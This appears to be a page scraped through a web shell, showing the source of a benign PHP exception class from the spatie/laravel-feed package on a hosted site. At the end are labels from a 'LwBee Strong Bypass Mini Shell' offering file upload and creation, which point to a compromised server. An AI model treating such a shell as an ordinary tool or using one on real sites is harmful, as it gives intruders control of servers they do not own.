/home/aloic1/public_html/core/vendor/spatie/laravel-feed/src/Exceptions/InvalidFeedItem.php
<?php

namespace Spatie\Feed\Exceptions;

use Exception;
use Spatie\Feed\FeedItem;

class InvalidFeedItem extends Exception
{
    /** @var \Spatie\Feed\FeedItem|null */
    public $subject;

    public static function notFeedable($subject)
    {
        return (new static('Object doesn\'t implement `Spatie\Feed\Feedable`'))->withSubject($subject);
    }

    public static function notAFeedItem($subject)
    {
        return (new static('`toFeedItem` should return an instance of `Spatie\Feed\Feedable`'))->withSubject($subject);
    }

    public static function missingField(FeedItem $subject, $field)
    {
        return (new static("Field `{$field}` is required"))->withSubject($subject);
    }

    protected function withSubject($subject)
    {
        $this->subject = $subject;

        return $this;
    }
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File